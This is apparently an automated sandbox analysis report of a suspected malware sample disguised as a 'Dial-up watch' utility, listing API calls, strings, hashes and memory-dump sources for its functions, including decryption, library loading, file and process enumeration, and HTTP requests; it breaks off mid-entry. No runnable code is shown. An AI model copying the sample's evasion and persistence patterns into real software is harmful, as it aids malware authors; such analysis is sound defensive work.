Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClassInfo
String ID: Dial-up watch
API String ID: 3534257612-2010764294
Opcode ID: 3753f81894d0928a783bedabd3343d75f2a7ee42ca7171c6fa280e14cf360379
Instruction ID: 8a0be24d7446a9ac6d6724fbf1d3260a329093057b3cf8abf035d1eb804e7448
Opcode Fuzzy Hash: 3753f81894d0928a783bedabd3343d75f2a7ee42ca7171c6fa280e14cf360379
Instruction Fuzzy Hash: B4016775101702AFD610A656DC81C5BB39CEF99328F40852FF84493241F738D855CBAA

Function 00438A2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

ScreenToClient.USER32(?,q"C), ref: 00438A42
ScreenToClient.USER32(?,?), ref: 00438A4B

Part of subcall function 0043376D: GetWindowLongA.USER32(?,000000EC), ref: 00433779

Strings

q"C, xrefs: 00438A38, 00438A3E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClientScreen$LongWindow
String ID: q"C
API String ID: 3170764692-3793063295
Opcode ID: 3d677422c3bd03ed05cf904e6023a04f3e60f895205e746bd89e4fb7c82d6092
Instruction ID: 671aa4caa523ea45402c31098815392302ba38257d1b8e67df5d9fef9c8de6b4
Opcode Fuzzy Hash: 3d677422c3bd03ed05cf904e6023a04f3e60f895205e746bd89e4fb7c82d6092
Instruction Fuzzy Hash: 9EE06D721007149FD7209F4AEC80A67F7A8EF85751B10442AF60143260CB30AD15CB68

Function 00429A80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23stringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000010), ref: 00429A9E
lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 00429AAE

Strings

ComboBox, xrefs: 00429AA8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClassNamelstrcmp
String ID: ComboBox
API String ID: 3770760073-1152790111
Opcode ID: 9ba1356f9f00318408bf832e6c8f902c7af3006bfaed8e0ccbb4692190458862
Instruction ID: 4aba4d1a21b90ac28d8a13d2fb7fa6984f96740a028ee71eebbaba044b295782
Opcode Fuzzy Hash: 9ba1356f9f00318408bf832e6c8f902c7af3006bfaed8e0ccbb4692190458862
Instruction Fuzzy Hash: 83E0DFB0700340ABD720AB649C19B3A32A5FB10702FD4095CF449C1192F7BAD948864A

Function 00403200 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

FindWindowA.USER32(Dial-up watch,00000000), ref: 00403208

Part of subcall function 00433913: ShowWindow.USER32(?,00405ADD,0043C400,00000000,?,00000000,00446637,?,?,?,00405ADD), ref: 00433921

SetForegroundWindow.USER32(?), ref: 00403227

Strings

Dial-up watch, xrefs: 00403203

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$FindForegroundShow
String ID: Dial-up watch
API String ID: 3423930798-2010764294
Opcode ID: f84334e4b31d18abab31d6e38ac2eb57df7bd894838fb7ec97917872b7e25cd3
Instruction ID: 2148f15ce20549052fcd6637cf0b5b4acba98c4f372fffe268851383a5facd32
Opcode Fuzzy Hash: f84334e4b31d18abab31d6e38ac2eb57df7bd894838fb7ec97917872b7e25cd3
Instruction Fuzzy Hash: A7D02B31F0172017CA303B747C19B9E26544F08722F410159F401EF281C9A8EC4183CC

Function 00449BD2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(?), ref: 00449BE2
GlobalAddAtomA.KERNEL32(system), ref: 00449BF0

Strings

system, xrefs: 00449BE4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AtomGlobal
String ID: system
API String ID: 2189174293-3377271179
Opcode ID: 8ced63ec918faf0f9ab3013f9957eb4bd6b273ce1860069d994aad8727b51aa4
Instruction ID: f41813563fcc26057a6a6376fa6d9e655dfd22cd2488a526a278135c6fa05a5d
Opcode Fuzzy Hash: 8ced63ec918faf0f9ab3013f9957eb4bd6b273ce1860069d994aad8727b51aa4
Instruction Fuzzy Hash: DED0C926118754AACA2067A9EC01B8BB2E9AFC5611F06442BE859931319BA068458759

Function 0044B030 Relevance: 5.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0044B08D
LeaveCriticalSection.KERNEL32(?,?), ref: 0044B09D
LocalFree.KERNEL32(?), ref: 0044B0A6
TlsSetValue.KERNEL32(?,00000000), ref: 0044B0BC

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: d10477873bc21d32402fd337f2c8cae16086adc1ae630c63c429b85d57875da7
Instruction ID: dbd8c11054a16c0687423679930e7d3fc89afe1212a73d64081ed237715704ae
Opcode Fuzzy Hash: d10477873bc21d32402fd337f2c8cae16086adc1ae630c63c429b85d57875da7
Instruction Fuzzy Hash: E5219A31200700EFE7248F44D885BABB7B4FF40742F10806AE9629B2A2C7B5E941CB95

Function 0044B56B Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5A6
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5B8
LeaveCriticalSection.KERNEL32(0046D470,?,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113), ref: 0044B5C1
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A), ref: 0044B5D3

Part of subcall function 0044B4D8: GetVersion.KERNEL32(?,0044B57B,?,0044B1D8,00000010,?,00000000,?,?,?,0044910D,0044915A,0044879C,00449113,0043427A,00436840), ref: 0044B4EB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 570fbd95e5e45b22f134061fe6df132eec57060057afeb5324a9a09188b63125
Instruction ID: 77cd2f642e01bf08761ab7f0832c55b2147a3c07371b8ee259ca629a0503a5a9
Opcode Fuzzy Hash: 570fbd95e5e45b22f134061fe6df132eec57060057afeb5324a9a09188b63125
Instruction Fuzzy Hash: F0F04F75E0020AEFD7109F65FC94966B3BDFB1431AF400037E64582022EBB4F855CAAD

Function 0041E551 Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,0041E3D2,?,0041AAD5), ref: 0041E55E
InitializeCriticalSection.KERNEL32(?,0041E3D2,?,0041AAD5), ref: 0041E566
InitializeCriticalSection.KERNEL32(?,0041E3D2,?,0041AAD5), ref: 0041E56E
InitializeCriticalSection.KERNEL32(?,0041E3D2,?,0041AAD5), ref: 0041E576

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 1286974005d19dd2242502f6f6af04d77cebf5bce1600c4942c4f9235fb37575
Instruction ID: 4f88cd937c1ab2c3b89638d25bd856e20294accbb3f7dda60177d9c95a59dee4
Opcode Fuzzy Hash: 1286974005d19dd2242502f6f6af04d77cebf5bce1600c4942c4f9235fb37575
Instruction Fuzzy Hash: 23C002318059349ACB112B65FC048553FA5EB042A13554072E90461231E6A17CB4DFDB

Analysis Process: provthrd.exePID: 6952, Parent PID: 1376COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	42.9%
Signature Coverage:	1%
Total number of Nodes:	860
Total number of Limit Nodes:	60

Executed Functions

Function 004036D0 Relevance: 39.2, APIs: 6, Strings: 16, Instructions: 664
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeConsole.KERNEL32 ref: 004037E6

Part of subcall function 00403690: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 004036A6

VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 004039B5
LoadIconA.USER32(?,000000C6), ref: 00403A83
CoInitialize.OLE32(00000000), ref: 00403AC5

Strings

.mdb, xrefs: 00403C70
lAlloc, xrefs: 00403830, 00403859
SDASQFddefgshdSSSgfdtEghfIITFDSSSSS, xrefs: 0040395C
l_E, xrefs: 004038F8
.dll, xrefs: 00403C5A
Keeps an eye on the dial-up connections, xrefs: 00403DDA
Connections, xrefs: 00403C36
Dial-up watch, xrefs: 00403A98
Virtua, xrefs: 004037EC, 00403815
76567567$%^#$@%$GFSDZDAHxsf, xrefs: 00403766, 0040378F
EDAWytyfghtyuGFASCZFSDSGSDGDSZC, xrefs: 00403704, 0040372D
\Dial-up watch.lnk, xrefs: 00403E5B
Josefsson, xrefs: 00403ACB
8192, xrefs: 0040399D
+pCZ_@Yjqp0E^j<ns$gq!FR%9+pHDhKd(^xHhwDFa4NpFHL#5ah6^fLsO, xrefs: 004039CF
kernel32.dll, xrefs: 004038DF

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: AcquireAllocConsoleContextCryptFreeIconInitializeLoadVirtual
String ID: +pCZ_@Yjqp0E^j<ns$gq!FR%9+pHDhKd(^xHhwDFa4NpFHL#5ah6^fLsO$.dll$.mdb$76567567$%^#$@%$GFSDZDAHxsf$8192$Connections$Dial-up watch$EDAWytyfghtyuGFASCZFSDSGSDGDSZC$Josefsson$Keeps an eye on the dial-up connections$SDASQFddefgshdSSSgfdtEghfIITFDSSSSS$Virtua$\Dial-up watch.lnk$kernel32.dll$lAlloc$l_E
API String ID: 3373098730-1518523355
Opcode ID: 5654d22ce2d4c17c3417717f518a6901d9dad7202a0b478aa85e50c2951b8442
Instruction ID: 4c438c1c8dd353153f84129de82d61fa0c4bc3a41b5224fbd4ec1f9a53ff1d4c
Opcode Fuzzy Hash: 5654d22ce2d4c17c3417717f518a6901d9dad7202a0b478aa85e50c2951b8442
Instruction Fuzzy Hash: B43208702083805AD314EF65D455BAFBBE4AFD5708F40092EF586532C2EBBD9909C76B

Function 008E1030 Relevance: 18.4, APIs: 12, Instructions: 362
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(008E4054,008E4040), ref: 008E1047
GetProcAddress.KERNEL32(00000000), ref: 008E104E

Part of subcall function 008E1B30: SetLastError.KERNEL32(0000000D,?,008E1070,?,00000040), ref: 008E1B3D

SetLastError.KERNEL32(000000C1), ref: 008E1096

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: 4a4a4a9cc72f4a991871d4cb1f906ba173a7a3f86e97feafc2c0d67b6526bfff
Instruction ID: afc96dd028156b0d46687962d9a5de061a9167ad10896d5d742b9fdbfd476a20
Opcode Fuzzy Hash: 4a4a4a9cc72f4a991871d4cb1f906ba173a7a3f86e97feafc2c0d67b6526bfff
Instruction Fuzzy Hash: B9F10AB4A00249EFDB04DF95C984AAEB7B1FF49308F208598E905AB391D734EE41DB95

Function 009038B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00903AC4
FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00903B1B
FindClose.KERNELBASE(?), ref: 00903B55

Strings

., xrefs: 0090390D
*LO, xrefs: 00903AA6

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: *LO$.
API String ID: 3541575487-2132576683
Opcode ID: b7152e399bec122dac34b90b12555666c76f5a145c50116ee56b0ab81f0bc7a3
Instruction ID: b69378016f6c0999a7bc37fe96b6c9e9af9716ec3538d3338d8f71b9e461979c
Opcode Fuzzy Hash: b7152e399bec122dac34b90b12555666c76f5a145c50116ee56b0ab81f0bc7a3
Instruction Fuzzy Hash: F251F3B17282008FCB24ABB49841B7F72ED9FD4740F40C92AF956C72D1EA79CE059752

Function 009080D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00908218

Strings

Ou, xrefs: 00908190
m, xrefs: 00908100
DR, xrefs: 00908108

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: DR$Ou$m
API String ID: 823142352-902897619
Opcode ID: 2545e36f5f15e51aedd2573272cdc1b345be6215fd9d412f250d115db59b35a0
Instruction ID: 8e4346ac018bf414723647db916902323fa53ec126d44ecfb6ccae65fe0c6e11
Opcode Fuzzy Hash: 2545e36f5f15e51aedd2573272cdc1b345be6215fd9d412f250d115db59b35a0
Instruction Fuzzy Hash: 0B61AC72A087019FD754DF68C845A2FB7E4AFD4B54F00891CF4E5972D0DBB8CA098B82

Function 00904B90 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00904C02
Process32FirstW.KERNEL32(?,0000022C), ref: 00904C60
FindCloseChangeNotification.KERNELBASE(?,?,?,?), ref: 00904CED

Strings

@UJ), xrefs: 00904CA9

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindFirstNotificationProcess32SnapshotToolhelp32
String ID: @UJ)
API String ID: 692674288-2550355097
Opcode ID: b8a9faf6e3ecf6072d067eb147221f35d4d8cebf97eca4d7327ec69272e3a9b3
Instruction ID: 4630285c1172662202a82685e8bfb25408d49ad04b333b4f51686c17b7587bbf
Opcode Fuzzy Hash: b8a9faf6e3ecf6072d067eb147221f35d4d8cebf97eca4d7327ec69272e3a9b3
Instruction Fuzzy Hash: 323148F17252108FE624AAB8AC45B7E32CD9BC0300B14892BF755DB2D0EA3CCD4593D1

Function 009025A0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 228
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 0090282F

Strings

=t, xrefs: 009028B8
=t, xrefs: 0090273E

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: =t$=t
API String ID: 1207547050-3586649727
Opcode ID: 438efc9458702cb1595a6db812cced65428d5f6b192650161519734f1042cd08
Instruction ID: 0ecec8ace21179d033f6e27c8283fc7a83a68de79e48fd0198ff95f1efd9a1e2
Opcode Fuzzy Hash: 438efc9458702cb1595a6db812cced65428d5f6b192650161519734f1042cd08
Instruction Fuzzy Hash: EE715B32B182119FDB68EB68DC59B6B729A6FD4700F044539FA49EF3E0EA21DC4097C5

Function 00403690 Relevance: 3.0, APIs: 2, Instructions: 25encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 004036A6
CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,00000000), ref: 004036BE

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: ae964a5621c021bca1bb6aca4b94374461255d92e87fbcd9fbf60fdd5d79beda
Instruction ID: ef64d0737d2536e9529a5b78dacf7c0428e1e8eef94a167ca9e1c2f0ff5251fc
Opcode Fuzzy Hash: ae964a5621c021bca1bb6aca4b94374461255d92e87fbcd9fbf60fdd5d79beda
Instruction Fuzzy Hash: 68E012713E430578F534DA609C43F9612C95794F15F60451DB346ED1C0DBF5A148862A

Function 0044ADBB Relevance: 15.1, APIs: 10, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(0046D3A8,0046D1D0,00000000,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044ADCA
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE1F
GlobalHandle.KERNEL32(00693AB8), ref: 0044AE28
GlobalUnlock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE31
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0044AE43
GlobalHandle.KERNEL32(00693AB8), ref: 0044AE5A
GlobalLock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE61
LeaveCriticalSection.KERNEL32(0041AB45,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE67
GlobalLock.KERNEL32(00000000,?,?,0046D38C,0046D38C,0044B156,?,00000000,004490F7,0044879C,00449113,0043427A,00436840,?,00000000), ref: 0044AE76
LeaveCriticalSection.KERNEL32(?), ref: 0044AEBF

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: a84cb7d6984c8d6d811a40fea39b0d0b602f93581ce9faa88f2f1d31b083148b
Instruction ID: bada2b594807bec06dbc502a2a2f514ce0bc9c65c8accb9ec4cd3993ec855e16
Opcode Fuzzy Hash: a84cb7d6984c8d6d811a40fea39b0d0b602f93581ce9faa88f2f1d31b083148b
Instruction Fuzzy Hash: FB31D2B12407059FE7209F28EC99A3BB7E9FF44305B00092EF866C3661E775E8148B15

Function 00902B60 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 311
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetConnectW.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00902CB4
HttpSendRequestW.WININET(00000000,?,000000FF,00000000,00000000), ref: 00902D34
ObtainUserAgentString.URLMON(00000000,00000000,00000200), ref: 00902DB7
InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00902E19
InternetCloseHandle.WININET(?), ref: 00902EC9

Strings

'aR, xrefs: 00902C21

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: Internet$AgentCloseConnectHandleHttpObtainOpenRequestSendStringUser
String ID: 'aR
API String ID: 1741791824-1895538066
Opcode ID: 26d4d459fa1a0931cbb80bb0b300241d3c137dbc239fcad77beb05456f757867
Instruction ID: 9277e427a360394bb23a2d8d634619b1ba4f3fc6907eb773acbea09709554d63
